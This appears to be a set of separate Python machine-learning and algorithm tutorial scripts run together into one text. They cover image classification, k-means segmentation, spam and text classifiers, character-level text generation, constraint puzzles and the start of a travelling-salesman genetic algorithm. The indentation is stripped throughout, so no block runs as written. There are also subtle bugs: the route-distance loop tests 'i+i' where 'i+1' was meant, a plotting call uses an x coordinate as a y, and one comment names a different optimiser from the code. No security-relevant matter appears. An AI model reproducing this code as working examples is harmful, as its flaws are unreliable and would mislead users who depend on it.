print("Val Accuracy:", evaluation[1])
# get a random batch of images
image_batch, label_batch = next(iter(validation_generator))
# turn the original labels into human-readable text
label_batch = [class_names[np.argmax(label_batch[i])] for i in range(batch_size)]
# predict the images on the model
predicted_class_names = model.predict(image_batch)
predicted_ids = [np.argmax(predicted_class_names[i]) for i in range(batch_size)]
# turn the predicted vectors to human readable labels
predicted_class_names = np.array([class_names[id] for id in predicted_ids])
# some nice plotting
plt.figure(figsize=(10,9))
for n in range(30):
plt.subplot(6,5,n+1)
plt.subplots_adjust(hspace = 0.3)
plt.imshow(image_batch[n])
if predicted_class_names[n] == label_batch[n]:
color = "blue"
title = predicted_class_names[n].title()
else:
color = "red"
title = f"{predicted_class_names[n].title()}, correct:{label_batch[n]}"
plt.title(title, color=color)
plt.axis('off')
_ = plt.suptitle("Model predictions (blue: correct, red: incorrect)")
plt.show()
import tensorflow as tf
from keras.models import Model
from keras.applications import MobileNetV2, ResNet50, InceptionV3 # try to use them and see which is better
from keras.layers import Dense
from keras.callbacks import ModelCheckpoint, TensorBoard
from keras.utils import get_file
from keras.preprocessing.image import ImageDataGenerator
import os
import pathlib
import numpy as np
batch_size = 32
num_classes = 5
epochs = 10
IMAGE_SHAPE = (224, 224, 3)
def load_data():
"""This function downloads, extracts, loads, normalizes and one-hot encodes Flower Photos dataset"""
# download the dataset and extract it
data_dir = get_file(origin='https://storage.googleapis.com/download.tensorflow.org/example_images/flower_photos.tgz',
fname='flower_photos', untar=True)
data_dir = pathlib.Path(data_dir)
# count how many images are there
image_count = len(list(data_dir.glob('*/*.jpg')))
print("Number of images:", image_count)
# get all classes for this dataset (types of flowers) excluding LICENSE file
CLASS_NAMES = np.array([item.name for item in data_dir.glob('*') if item.name != "LICENSE.txt"])
# roses = list(data_dir.glob('roses/*'))
# 20% validation set 80% training set
image_generator = ImageDataGenerator(rescale=1/255, validation_split=0.2)
# make the training dataset generator
train_data_gen = image_generator.flow_from_directory(directory=str(data_dir), batch_size=batch_size,
classes=list(CLASS_NAMES), target_size=(IMAGE_SHAPE[0], IMAGE_SHAPE[1]),
shuffle=True, subset="training")
# make the validation dataset generator
test_data_gen = image_generator.flow_from_directory(directory=str(data_dir), batch_size=batch_size,
classes=list(CLASS_NAMES), target_size=(IMAGE_SHAPE[0], IMAGE_SHAPE[1]),
shuffle=True, subset="validation")
return train_data_gen, test_data_gen, CLASS_NAMES
def create_model(input_shape):
# load MobileNetV2
model = MobileNetV2(input_shape=input_shape)
# remove the last fully connected layer
model.layers.pop()
# freeze all the weights of the model except the last 4 layers
for layer in model.layers[:-4]:
layer.trainable = False
# construct our own fully connected layer for classification
output = Dense(num_classes, activation="softmax")
# connect that dense layer to the model
output = output(model.layers[-1].output)
model = Model(inputs=model.inputs, outputs=output)
# print the summary of the model architecture
model.summary()
# training the model using rmsprop optimizer
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
return model
if __name__ == "__main__":
# load the data generators
train_generator, validation_generator, class_names = load_data()
# constructs the model
model = create_model(input_shape=IMAGE_SHAPE)
# model name
model_name = "MobileNetV2_finetune_last5"
# some nice callbacks
tensorboard = TensorBoard(log_dir=f"logs/{model_name}")
checkpoint = ModelCheckpoint(f"results/{model_name}" + "-loss-{val_loss:.2f}-acc-{val_acc:.2f}.h5",
save_best_only=True,
verbose=1)
# make sure results folder exist
if not os.path.isdir("results"):
os.mkdir("results")
# count number of steps per epoch
training_steps_per_epoch = np.ceil(train_generator.samples / batch_size)
validation_steps_per_epoch = np.ceil(validation_generator.samples / batch_size)
# train using the generators
model.fit_generator(train_generator, steps_per_epoch=training_steps_per_epoch,
validation_data=validation_generator, validation_steps=validation_steps_per_epoch,
epochs=epochs, verbose=1, callbacks=[tensorboard, checkpoint])
import cv2
import numpy as np
import matplotlib.pyplot as plt
import sys
# read the image
image = cv2.imread(sys.argv[1])
# convert to RGB
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# reshape the image to a 2D array of pixels and 3 color values (RGB)
pixel_values = image.reshape((-1, 3))
# convert to float
pixel_values = np.float32(pixel_values)
# define stopping criteria
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 100, 0.2)
# number of clusters (K)
k = 3
compactness, labels, (centers) = cv2.kmeans(pixel_values, k, None, criteria, 10, cv2.KMEANS_RANDOM_CENTERS)
# convert back to 8 bit values
centers = np.uint8(centers)
# flatten the labels array
labels = labels.flatten()
# convert all pixels to the color of the centroids
segmented_image = centers[labels]
# reshape back to the original image dimension
segmented_image = segmented_image.reshape(image.shape)
# show the image
plt.imshow(segmented_image)
plt.show()
# disable only the cluster number 2 (turn the pixel into black)
masked_image = np.copy(image)
# convert to the shape of a vector of pixel values
masked_image = masked_image.reshape((-1, 3))
# color (i.e cluster) to disable
cluster = 2
masked_image[labels == cluster] = [0, 0, 0]
# convert back to original shape
masked_image = masked_image.reshape(image.shape)
# show the image
plt.imshow(masked_image)
plt.show()
import cv2
import numpy as np
cap = cv2.VideoCapture(0)
k = 5
# define stopping criteria
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 100, 0.2)
while True:
# read the image
_, image = cap.read()
# reshape the image to a 2D array of pixels and 3 color values (RGB)
pixel_values = image.reshape((-1, 3))
# convert to float
pixel_values = np.float32(pixel_values)
# number of clusters (K)
_, labels, (centers) = cv2.kmeans(pixel_values, k, None, criteria, 10, cv2.KMEANS_RANDOM_CENTERS)
# convert back to 8 bit values
centers = np.uint8(centers)
# convert all pixels to the color of the centroids
segmented_image = centers[labels.flatten()]
# reshape back to the original image dimension
segmented_image = segmented_image.reshape(image.shape)
# reshape labels too
labels = labels.reshape(image.shape[0], image.shape[1])
cv2.imshow("segmented_image", segmented_image)
# visualize each segment
if cv2.waitKey(1) == ord("q"):
break
cap.release()
cv2.destroyAllWindows()
# to use CPU uncomment below code
# import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils import to_categorical
from keras.callbacks import ModelCheckpoint, TensorBoard
from sklearn.model_selection import train_test_split
import time
import numpy as np
import pickle
from utils import get_embedding_vectors, get_model, SEQUENCE_LENGTH, EMBEDDING_SIZE, TEST_SIZE
from utils import BATCH_SIZE, EPOCHS, int2label, label2int
def load_data():
"""
Loads SMS Spam Collection dataset
"""
texts, labels = [], []
with open("data/SMSSpamCollection") as f:
for line in f:
split = line.split()
labels.append(split[0].strip())
texts.append(' '.join(split[1:]).strip())
return texts, labels
# load the data
X, y = load_data()
# Text tokenization
# vectorizing text, turning each text into sequence of integers
tokenizer = Tokenizer()
tokenizer.fit_on_texts(X)
# lets dump it to a file, so we can use it in testing
pickle.dump(tokenizer, open("results/tokenizer.pickle", "wb"))
# convert to sequence of integers
X = tokenizer.texts_to_sequences(X)
print(X[0])
# convert to numpy arrays
X = np.array(X)
y = np.array(y)
# pad sequences at the beginning of each sequence with 0's
# for example if SEQUENCE_LENGTH=4:
# [[5, 3, 2], [5, 1, 2, 3], [3, 4]]
# will be transformed to:
# [[0, 5, 3, 2], [5, 1, 2, 3], [0, 0, 3, 4]]
X = pad_sequences(X, maxlen=SEQUENCE_LENGTH)
print(X[0])
# One Hot encoding labels
# [spam, ham, spam, ham, ham] will be converted to:
# [1, 0, 1, 0, 1] and then to:
# [[0, 1], [1, 0], [0, 1], [1, 0], [0, 1]]
y = [ label2int[label] for label in y ]
y = to_categorical(y)
print(y[0])
# split and shuffle
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=TEST_SIZE, random_state=7)
# constructs the model with 128 LSTM units
model = get_model(tokenizer=tokenizer, lstm_units=128)
# initialize our ModelCheckpoint and TensorBoard callbacks
# model checkpoint for saving best weights
model_checkpoint = ModelCheckpoint("results/spam_classifier_{val_loss:.2f}", save_best_only=True,
verbose=1)
# for better visualization
tensorboard = TensorBoard(f"logs/spam_classifier_{time.time()}")
# print our data shapes
print("X_train.shape:", X_train.shape)
print("X_test.shape:", X_test.shape)
print("y_train.shape:", y_train.shape)
print("y_test.shape:", y_test.shape)
# train the model
model.fit(X_train, y_train, validation_data=(X_test, y_test),
batch_size=BATCH_SIZE, epochs=EPOCHS,
callbacks=[tensorboard, model_checkpoint],
verbose=1)
# get the loss and metrics
result = model.evaluate(X_test, y_test)
# extract those
loss = result[0]
accuracy = result[1]
precision = result[2]
recall = result[3]
print(f"[+] Accuracy: {accuracy*100:.2f}%")
print(f"[+] Precision: {precision*100:.2f}%")
print(f"[+] Recall: {recall*100:.2f}%")
import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
from utils import get_model, int2label, label2int
from keras.preprocessing.sequence import pad_sequences
import pickle
import numpy as np
SEQUENCE_LENGTH = 100
# get the tokenizer
tokenizer = pickle.load(open("results/tokenizer.pickle", "rb"))
model = get_model(tokenizer, 128)
model.load_weights("results/spam_classifier_0.05")
def get_predictions(text):
sequence = tokenizer.texts_to_sequences([text])
# pad the sequence
sequence = pad_sequences(sequence, maxlen=SEQUENCE_LENGTH)
# get the prediction
prediction = model.predict(sequence)[0]
# one-hot encoded vector, revert using np.argmax
return int2label[np.argmax(prediction)]
while True:
text = input("Enter the mail:")
# convert to sequences
print(get_predictions(text))
import tqdm
import numpy as np
from keras.preprocessing.sequence import pad_sequences
from keras.layers import Embedding, LSTM, Dropout, Dense
from keras.models import Sequential
import keras_metrics
SEQUENCE_LENGTH = 100 # the length of all sequences (number of words per sample)
EMBEDDING_SIZE = 100 # Using 100-Dimensional GloVe embedding vectors
TEST_SIZE = 0.25 # ratio of testing set
BATCH_SIZE = 64
EPOCHS = 20 # number of epochs
label2int = {"ham": 0, "spam": 1}
int2label = {0: "ham", 1: "spam"}
def get_embedding_vectors(tokenizer, dim=100):
embedding_index = {}
with open(f"data/glove.6B.{dim}d.txt", encoding='utf8') as f:
for line in tqdm.tqdm(f, "Reading GloVe"):
values = line.split()
word = values[0]
vectors = np.asarray(values[1:], dtype='float32')
embedding_index[word] = vectors
word_index = tokenizer.word_index
# we do +1 because Tokenizer() starts from 1
embedding_matrix = np.zeros((len(word_index)+1, dim))
for word, i in word_index.items():
embedding_vector = embedding_index.get(word)
if embedding_vector is not None:
# words not found will be 0s
embedding_matrix[i] = embedding_vector
return embedding_matrix
def get_model(tokenizer, lstm_units):
"""
Constructs the model,
Embedding vectors => LSTM => 2 output Fully-Connected neurons with softmax activation
"""
# get the GloVe embedding vectors
embedding_matrix = get_embedding_vectors(tokenizer)
model = Sequential()
model.add(Embedding(len(tokenizer.word_index)+1,
EMBEDDING_SIZE,
weights=[embedding_matrix],
trainable=False,
input_length=SEQUENCE_LENGTH))
model.add(LSTM(lstm_units, recurrent_dropout=0.2))
model.add(Dropout(0.3))
model.add(Dense(2, activation="softmax"))
# compile as rmsprop optimizer
# aswell as with recall metric
model.compile(optimizer="rmsprop", loss="categorical_crossentropy",
metrics=["accuracy", keras_metrics.precision(), keras_metrics.recall()])
model.summary()
return model
from tensorflow.keras.callbacks import TensorBoard
import os
from parameters import *
from utils import create_model, load_20_newsgroup_data
# create these folders if they does not exist
if not os.path.isdir("results"):
os.mkdir("results")
if not os.path.isdir("logs"):
os.mkdir("logs")
if not os.path.isdir("data"):
os.mkdir("data")
# dataset name, IMDB movie reviews dataset
dataset_name = "20_news_group"
# get the unique model name based on hyper parameters on parameters.py
model_name = get_model_name(dataset_name)
# load the data
data = load_20_newsgroup_data(N_WORDS, SEQUENCE_LENGTH, TEST_SIZE, oov_token=OOV_TOKEN)
model = create_model(data["tokenizer"].word_index, units=UNITS, n_layers=N_LAYERS,
cell=RNN_CELL, bidirectional=IS_BIDIRECTIONAL, embedding_size=EMBEDDING_SIZE,
sequence_length=SEQUENCE_LENGTH, dropout=DROPOUT,
loss=LOSS, optimizer=OPTIMIZER, output_length=data["y_train"][0].shape[0])
model.summary()
tensorboard = TensorBoard(log_dir=os.path.join("logs", model_name))
history = model.fit(data["X_train"], data["y_train"],
batch_size=BATCH_SIZE,
epochs=EPOCHS,
validation_data=(data["X_test"], data["y_test"]),
callbacks=[tensorboard],
verbose=1)
model.save(os.path.join("results", model_name) + ".h5")
from tensorflow.keras.layers import LSTM
# max number of words in each sentence
SEQUENCE_LENGTH = 300
# N-Dimensional GloVe embedding vectors
EMBEDDING_SIZE = 300
# number of words to use, discarding the rest
N_WORDS = 10000
# out of vocabulary token
OOV_TOKEN = None
# 30% testing set, 70% training set
TEST_SIZE = 0.3
# number of CELL layers
N_LAYERS = 1
# the RNN cell to use, LSTM in this case
RNN_CELL = LSTM
# whether it's a bidirectional RNN
IS_BIDIRECTIONAL = False
# number of units (RNN_CELL ,nodes) in each layer
UNITS = 128
# dropout rate
DROPOUT = 0.4
### Training parameters
LOSS = "categorical_crossentropy"
OPTIMIZER = "adam"
BATCH_SIZE = 64
EPOCHS = 6
def get_model_name(dataset_name):
# construct the unique model name
model_name = f"{dataset_name}-{RNN_CELL.__name__}-seq-{SEQUENCE_LENGTH}-em-{EMBEDDING_SIZE}-w-{N_WORDS}-layers-{N_LAYERS}-units-{UNITS}-opt-{OPTIMIZER}-BS-{BATCH_SIZE}-d-{DROPOUT}"
if IS_BIDIRECTIONAL:
# add 'bid' str if bidirectional
model_name = "bid-" + model_name
if OOV_TOKEN:
# add 'oov' str if OOV token is specified
model_name += "-oov"
return model_name
from tensorflow.keras.callbacks import TensorBoard
import os
from parameters import *
from utils import create_model, load_imdb_data
# create these folders if they does not exist
if not os.path.isdir("results"):
os.mkdir("results")
if not os.path.isdir("logs"):
os.mkdir("logs")
if not os.path.isdir("data"):
os.mkdir("data")
# dataset name, IMDB movie reviews dataset
dataset_name = "imdb"
# get the unique model name based on hyper parameters on parameters.py
model_name = get_model_name(dataset_name)
# load the data
data = load_imdb_data(N_WORDS, SEQUENCE_LENGTH, TEST_SIZE, oov_token=OOV_TOKEN)
model = create_model(data["tokenizer"].word_index, units=UNITS, n_layers=N_LAYERS,
cell=RNN_CELL, bidirectional=IS_BIDIRECTIONAL, embedding_size=EMBEDDING_SIZE,
sequence_length=SEQUENCE_LENGTH, dropout=DROPOUT,
loss=LOSS, optimizer=OPTIMIZER, output_length=data["y_train"][0].shape[0])
model.summary()
tensorboard = TensorBoard(log_dir=os.path.join("logs", model_name))
history = model.fit(data["X_train"], data["y_train"],
batch_size=BATCH_SIZE,
epochs=EPOCHS,
validation_data=(data["X_test"], data["y_test"]),
callbacks=[tensorboard],
verbose=1)
model.save(os.path.join("results", model_name) + ".h5")
from tensorflow.keras.preprocessing.sequence import pad_sequences
import numpy as np
from parameters import *
from utils import create_model, load_20_newsgroup_data, load_imdb_data
import pickle
import os
# dataset name, IMDB movie reviews dataset
dataset_name = "imdb"
# get the unique model name based on hyper parameters on parameters.py
model_name = get_model_name(dataset_name)
# data = load_20_newsgroup_data(N_WORDS, SEQUENCE_LENGTH, TEST_SIZE, oov_token=OOV_TOKEN)
data = load_imdb_data(N_WORDS, SEQUENCE_LENGTH, TEST_SIZE, oov_token=OOV_TOKEN)
model = create_model(data["tokenizer"].word_index, units=UNITS, n_layers=N_LAYERS,
cell=RNN_CELL, bidirectional=IS_BIDIRECTIONAL, embedding_size=EMBEDDING_SIZE,
sequence_length=SEQUENCE_LENGTH, dropout=DROPOUT,
loss=LOSS, optimizer=OPTIMIZER, output_length=data["y_train"][0].shape[0])
model.load_weights(os.path.join("results", f"{model_name}.h5"))
def get_predictions(text):
sequence = data["tokenizer"].texts_to_sequences([text])
# pad the sequences
sequence = pad_sequences(sequence, maxlen=SEQUENCE_LENGTH)
# get the prediction
prediction = model.predict(sequence)[0]
print("output vector:", prediction)
return data["int2label"][np.argmax(prediction)]
while True:
text = input("Enter your text: ")
prediction = get_predictions(text)
print("="*50)
print("The class is:", prediction)
from tqdm import tqdm
import numpy as np
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.layers import Dense, Dropout, LSTM, Embedding, Bidirectional
from tensorflow.keras.models import Sequential
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.utils import to_categorical
from sklearn.model_selection import train_test_split
from sklearn.datasets import fetch_20newsgroups
from glob import glob
import random
def get_embedding_vectors(word_index, embedding_size=100):
embedding_matrix = np.zeros((len(word_index) + 1, embedding_size))
with open(f"data/glove.6B.{embedding_size}d.txt", encoding="utf8") as f:
for line in tqdm(f, "Reading GloVe"):
values = line.split()
# get the word as the first word in the line
word = values[0]
if word in word_index:
idx = word_index[word]
# get the vectors as the remaining values in the line
embedding_matrix[idx] = np.array(values[1:], dtype="float32")
return embedding_matrix
def create_model(word_index, units=128, n_layers=1, cell=LSTM, bidirectional=False,
embedding_size=100, sequence_length=100, dropout=0.3,
loss="categorical_crossentropy", optimizer="adam",
output_length=2):
"""
Constructs a RNN model given its parameters
"""
embedding_matrix = get_embedding_vectors(word_index, embedding_size)
model = Sequential()
# add the embedding layer
model.add(Embedding(len(word_index) + 1,
embedding_size,
weights=[embedding_matrix],
trainable=False,
input_length=sequence_length))
for i in range(n_layers):
if i == n_layers - 1:
# last layer
if bidirectional:
model.add(Bidirectional(cell(units, return_sequences=False)))
else:
model.add(cell(units, return_sequences=False))
else:
# first layer or hidden layers
if bidirectional:
model.add(Bidirectional(cell(units, return_sequences=True)))
else:
model.add(cell(units, return_sequences=True))
model.add(Dropout(dropout))
model.add(Dense(output_length, activation="softmax"))
# compile the model
model.compile(optimizer=optimizer, loss=loss, metrics=["accuracy"])
return model
def load_imdb_data(num_words, sequence_length, test_size=0.25, oov_token=None):
# read reviews
reviews = []
with open("data/reviews.txt") as f:
for review in f:
review = review.strip()
reviews.append(review)
labels = []
with open("data/labels.txt") as f:
for label in f:
label = label.strip()
labels.append(label)
# tokenize the dataset corpus, delete uncommon words such as names, etc.
tokenizer = Tokenizer(num_words=num_words, oov_token=oov_token)
tokenizer.fit_on_texts(reviews)
X = tokenizer.texts_to_sequences(reviews)
X, y = np.array(X), np.array(labels)
# pad sequences with 0's
X = pad_sequences(X, maxlen=sequence_length)
# convert labels to one-hot encoded
y = to_categorical(y)
# split data to training and testing sets
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state=1)
data = {}
data["X_train"] = X_train
data["X_test"]= X_test
data["y_train"] = y_train
data["y_test"] = y_test
data["tokenizer"] = tokenizer
data["int2label"] = {0: "negative", 1: "positive"}
data["label2int"] = {"negative": 0, "positive": 1}
return data
def load_20_newsgroup_data(num_words, sequence_length, test_size=0.25, oov_token=None):
# load the 20 news groups dataset
# shuffling the data & removing each document's header, signature blocks and quotation blocks
dataset = fetch_20newsgroups(subset="all", shuffle=True, remove=("headers", "footers", "quotes"))
documents = dataset.data
labels = dataset.target
tokenizer = Tokenizer(num_words=num_words, oov_token=oov_token)
tokenizer.fit_on_texts(documents)
X = tokenizer.texts_to_sequences(documents)
X, y = np.array(X), np.array(labels)
# pad sequences with 0's
X = pad_sequences(X, maxlen=sequence_length)
# convert labels to one-hot encoded
y = to_categorical(y)
# split data to training and testing sets
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state=1)
data = {}
data["X_train"] = X_train
data["X_test"]= X_test
data["y_train"] = y_train
data["y_test"] = y_test
data["tokenizer"] = tokenizer
data["int2label"] = { i: label for i, label in enumerate(dataset.target_names) }
data["label2int"] = { label: i for i, label in enumerate(dataset.target_names) }
return data
import numpy as np
import pickle
import tqdm
from keras.models import Sequential
from keras.layers import Dense, LSTM, Dropout, Activation
from keras.callbacks import ModelCheckpoint
message = """
Please choose which model you want to generate text with:
1 - Alice's wonderland
2 - Python Code
"""
choice = int(input(message))
assert choice == 1 or choice == 2
if choice == 1:
char2int = pickle.load(open("data/wonderland-char2int.pickle", "rb"))
int2char = pickle.load(open("data/wonderland-int2char.pickle", "rb"))
elif choice == 2:
char2int = pickle.load(open("data/python-char2int.pickle", "rb"))
int2char = pickle.load(open("data/python-int2char.pickle", "rb"))
sequence_length = 100
n_unique_chars = len(char2int)
# building the model
model = Sequential([
LSTM(256, input_shape=(sequence_length, n_unique_chars), return_sequences=True),
Dropout(0.3),
LSTM(256),
Dense(n_unique_chars, activation="softmax"),
])
if choice == 1:
model.load_weights("results/wonderland-v2-0.75.h5")
elif choice == 2:
model.load_weights("results/python-v2-0.30.h5")
seed = ""
print("Enter the seed, enter q to quit, maximum 100 characters:")
while True:
result = input("")
if result.lower() == "q":
break
seed += f"{result}\n"
seed = seed.lower()
n_chars = int(input("Enter number of characters you want to generate: "))
# generate 400 characters
generated = ""
for i in tqdm.tqdm(range(n_chars), "Generating text"):
# make the input sequence
X = np.zeros((1, sequence_length, n_unique_chars))
for t, char in enumerate(seed):
X[0, (sequence_length - len(seed)) + t, char2int[char]] = 1
# predict the next character
predicted = model.predict(X, verbose=0)[0]
# converting the vector to an integer
next_index = np.argmax(predicted)
# converting the integer to a character
next_char = int2char[next_index]
# add the character to results
generated += next_char
# shift seed and the predicted character
seed = seed[1:] + next_char
print("Generated text:")
print(generated)
import tensorflow as tf
import numpy as np
import os
import pickle
SEQUENCE_LENGTH = 200
FILE_PATH = "data/python_code.py"
BASENAME = os.path.basename(FILE_PATH)
text = open(FILE_PATH).read()
n_chars = len(text)
vocab = ''.join(sorted(set(text)))
print("vocab:", vocab)
n_unique_chars = len(vocab)
print("Number of characters:", n_chars)
print("Number of unique characters:", n_unique_chars)
# dictionary that converts characters to integers
char2int = {c: i for i, c in enumerate(vocab)}
# dictionary that converts integers to characters
int2char = {i: c for i, c in enumerate(vocab)}
# save these dictionaries for later generation
pickle.dump(char2int, open(f"{BASENAME}-char2int.pickle", "wb"))
pickle.dump(int2char, open(f"{BASENAME}-int2char.pickle", "wb"))
encoded_text = np.array([char2int[c] for c in text])
import tensorflow as tf
import numpy as np
import os
import pickle
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, LSTM, Dropout
from tensorflow.keras.callbacks import ModelCheckpoint
from string import punctuation
sequence_length = 100
BATCH_SIZE = 128
EPOCHS = 30
# dataset file path
FILE_PATH = "data/wonderland.txt"
# FILE_PATH = "data/python_code.py"
BASENAME = os.path.basename(FILE_PATH)
# commented because already downloaded
# import requests
# content = requests.get("http://www.gutenberg.org/cache/epub/11/pg11.txt").text
# open("data/wonderland.txt", "w", encoding="utf-8").write(content)
# read the data
text = open(FILE_PATH, encoding="utf-8").read()
# remove caps, comment this code if you want uppercase characters as well
text = text.lower()
# remove punctuation
text = text.translate(str.maketrans("", "", punctuation))
# print some stats
n_chars = len(text)
vocab = ''.join(sorted(set(text)))
print("unique_chars:", vocab)
n_unique_chars = len(vocab)
print("Number of characters:", n_chars)
print("Number of unique characters:", n_unique_chars)
# dictionary that converts characters to integers
char2int = {c: i for i, c in enumerate(vocab)}
# dictionary that converts integers to characters
int2char = {i: c for i, c in enumerate(vocab)}
# save these dictionaries for later generation
pickle.dump(char2int, open(f"{BASENAME}-char2int.pickle", "wb"))
pickle.dump(int2char, open(f"{BASENAME}-int2char.pickle", "wb"))
# convert all text into integers
encoded_text = np.array([char2int[c] for c in text])
# construct tf.data.Dataset object
char_dataset = tf.data.Dataset.from_tensor_slices(encoded_text)
# print first 5 characters
for char in char_dataset.take(5):
print(char.numpy())
# build sequences by batching
sequences = char_dataset.batch(2*sequence_length + 1, drop_remainder=True)
def split_sample(sample):
ds = tf.data.Dataset.from_tensors((sample[:sequence_length], sample[sequence_length]))
for i in range(1, (len(sample)-1) // 2):
input_ = sample[i: i+sequence_length]
target = sample[i+sequence_length]
other_ds = tf.data.Dataset.from_tensors((input_, target))
ds = ds.concatenate(other_ds)
return ds
def one_hot_samples(input_, target):
return tf.one_hot(input_, n_unique_chars), tf.one_hot(target, n_unique_chars)
sentences = []
y_train = []
for i in range(0, len(text) - sequence_length):
sentences.append(text[i: i + sequence_length])
y_train.append(text[i+sequence_length])
print("Number of sentences:", len(sentences))
# vectorization
X = np.zeros((len(sentences), sequence_length, n_unique_chars))
y = np.zeros((len(sentences), n_unique_chars))
for i, sentence in enumerate(sentences):
for t, char in enumerate(sentence):
X[i, t, char2int[char]] = 1
y[i, char2int[y_train[i]]] = 1
print("X.shape:", X.shape)
# building the model
# model = Sequential([
# LSTM(128, input_shape=(sequence_length, n_unique_chars)),
# Dense(n_unique_chars, activation="softmax"),
# ])
# a better model (slower to train obviously)
model = Sequential([
LSTM(256, input_shape=(sequence_length, n_unique_chars), return_sequences=True),
Dropout(0.3),
LSTM(256),
Dense(n_unique_chars, activation="softmax"),
])
# model.load_weights("results/wonderland-v2-2.48.h5")
model.summary()
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
if not os.path.isdir("results"):
os.mkdir("results")
checkpoint = ModelCheckpoint("results/wonderland-v2-{loss:.2f}.h5", verbose=1)
# train the model
model.fit(X, y, batch_size=BATCH_SIZE, epochs=EPOCHS, callbacks=[checkpoint])
from constraint import Problem, Domain, AllDifferentConstraint
import matplotlib.pyplot as plt
import numpy as np
def _get_pairs(variables):
work = list(variables)
pairs = [ (work[i], work[i+1]) for i in range(len(work)-1) ]
return pairs
def n_queens(n=8):
def not_in_diagonal(a, b):
result = True
for i in range(1, n):
result = result and ( a != b + i )
return result
problem = Problem()
variables = { f'x{i}' for i in range(n) }
problem.addVariables(variables, Domain(set(range(1, n+1))))
problem.addConstraint(AllDifferentConstraint())
for pair in _get_pairs(variables):
problem.addConstraint(not_in_diagonal, pair)
return problem.getSolutions()
def magic_square(n=3):
def all_equal(*variables):
square = np.reshape(variables, (n, n))
diagonal = sum(np.diagonal(square))
b = True
for i in range(n):
b = b and sum(square[i, :]) == diagonal
b = b and sum(square[:, i]) == diagonal
if b:
print(square)
return b
problem = Problem()
variables = { f'x{i}{j}' for i in range(1, n+1) for j in range(1, n+1) }
problem.addVariables(variables, Domain(set(range(1, (n**2 + 2)))))
problem.addConstraint(all_equal, variables)
problem.addConstraint(AllDifferentConstraint())
return problem.getSolutions()
def plot_queens(solutions):
for solution in solutions:
for row, column in solution.items():
x = int(row.lstrip('x'))
y = column
plt.scatter(x, y, s=70)
plt.grid()
plt.show()
if __name__ == "__main__":
# solutions = n_queens(n=12)
# print(solutions)
# plot_queens(solutions)
solutions = magic_square(n=4)
for solution in solutions:
print(solution)
import numpy as np
import random
import operator
import pandas as pd
import matplotlib.pyplot as plt
import seaborn
from matplotlib import animation
from realtime_plot import realtime_plot
from threading import Thread, Event
from time import sleep
seaborn.set_style("dark")
stop_animation = Event()
# def animate_cities_and_routes():
# global route
# def wrapped():
# # create figure
# sleep(3)
# print("thread:", route)
# figure = plt.figure(figsize=(14, 8))
# ax1 = figure.add_subplot(1, 1, 1)
# def animate(i):
# ax1.title.set_text("Real time routes")
# for city in route:
# ax1.scatter(city.x, city.y, s=70, c='b')
# ax1.plot([ city.x for city in route ], [city.y for city in route], c='r')
# animation.FuncAnimation(figure, animate, interval=100)
# plt.show()
# t = Thread(target=wrapped)
# t.start()
def plot_routes(initial_route, final_route):
_, ax = plt.subplots(nrows=1, ncols=2)
for col, route in zip(ax, [("Initial Route", initial_route), ("Final Route", final_route) ]):
col.title.set_text(route[0])
route = route[1]
for city in route:
col.scatter(city.x, city.y, s=70, c='b')
col.plot([ city.x for city in route ], [city.y for city in route], c='r')
col.plot([route[-1].x, route[0].x], [route[-1].x, route[-1].y])
plt.show()
def animate_progress():
global route
global progress
global stop_animation
def animate():
# figure = plt.figure()
# ax1 = figure.add_subplot(1, 1, 1)
figure, ax1 = plt.subplots(nrows=1, ncols=2)
while True:
ax1[0].clear()
ax1[1].clear()
# current routes and cities
ax1[0].title.set_text("Current routes")
for city in route:
ax1[0].scatter(city.x, city.y, s=70, c='b')
ax1[0].plot([ city.x for city in route ], [city.y for city in route], c='r')
ax1[0].plot([route[-1].x, route[0].x], [route[-1].y, route[0].y], c='r')
# current distance graph
ax1[1].title.set_text("Current distance")
ax1[1].plot(progress)
ax1[1].set_ylabel("Distance")
ax1[1].set_xlabel("Generation")
plt.pause(0.05)
if stop_animation.is_set():
break
plt.show()
Thread(target=animate).start()
class City:
def __init__(self, x, y):
self.x = x
self.y = y
def distance(self, city):
"""Returns distance between self city and city"""
x = abs(self.x - city.x)
y = abs(self.y - city.y)
return np.sqrt(x ** 2 + y ** 2)
def __sub__(self, city):
return self.distance(city)
def __repr__(self):
return f"({self.x}, {self.y})"
def __str__(self):
return self.__repr__()
class Fitness:
def __init__(self, route):
self.route = route
def distance(self):
distance = 0
for i in range(len(self.route)):
from_city = self.route[i]
to_city = self.route[i+1] if i+i < len(self.route) else self.route[0]
distance += (from_city - to_city)
return distance
def fitness(self):
return 1 / self.distance()
def generate_cities(size):
cities = []
for i in range(size):
x = random.randint(0, 200)
y = random.randint(0, 200)
if 40 < x < 160:
if 0.5 <= random.random():
y = random.randint(0, 40)
else:
y = random.randint(160, 200)
elif 40 < y < 160:
if 0.5 <= random.random():
x = random.randint(0, 40)
else:
x = random.randint(160, 200)
cities.append(City(x, y))
return cities
# return [ City(x=random.randint(0, 200), y=random.randint(0, 200)) for i in range(size) ]
def create_route(cities):
return random.sample(cities, len(cities))
